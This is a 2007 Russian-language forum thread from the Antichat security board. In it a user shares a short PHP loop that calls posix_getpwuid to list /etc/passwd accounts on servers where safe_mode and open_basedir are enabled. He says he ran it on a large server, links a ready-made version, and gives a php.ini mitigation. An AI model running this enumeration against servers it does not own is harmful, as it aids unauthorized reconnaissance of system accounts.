ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

posix_getpwuid и /etc/passwd
  #1  
Старый 14.05.2007, 11:59
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
Thumbs up posix_getpwuid и /etc/passwd

вот увидел функсию posix_getpwuid и подумав решил вот так

Код:
    	                                for($uid=0;$uid<60000;$uid++){

                                        $ara = posix_getpwuid($uid); //тут читаем "/etc/passwd"

                                                if (!empty($ara)) {

                                                while (list ($key, $val) = each($ara)){

                                                print "$val:";
и сработало выложил в php файл. залил на крупный сервант и пашеееет. в safe_mod=on & open_basedir.

Tyt можно готовый взять: www.muhacir.info/tools/somsa.txt
++

чтобы прикрыть баг нужно в php.ini disabled_funcitions добавить строку posix_getpwuid

Последний раз редактировалось Muhacir; 14.05.2007 в 12:07..
 
Ответить с цитированием

  #2  
Старый 14.05.2007, 12:16
Linuxoid
Участник форума
Регистрация: 13.02.2007
Сообщений: 205
Провел на форуме:
928552

Репутация: 55
Отправить сообщение для Linuxoid с помощью ICQ
По умолчанию

А сервера с safe_mod=on разве еще официально в Красную книгу не занесли?
Ну а если сам до этого всетаки додумался, то однозначно молодец!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
/etc/passwd (login:login) convert guest3297 PHP, PERL, MySQL, JavaScript 7 26.01.2007 00:31
Парсер /etc/passwd dim_ok PHP, PERL, MySQL, JavaScript 5 22.05.2005 11:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ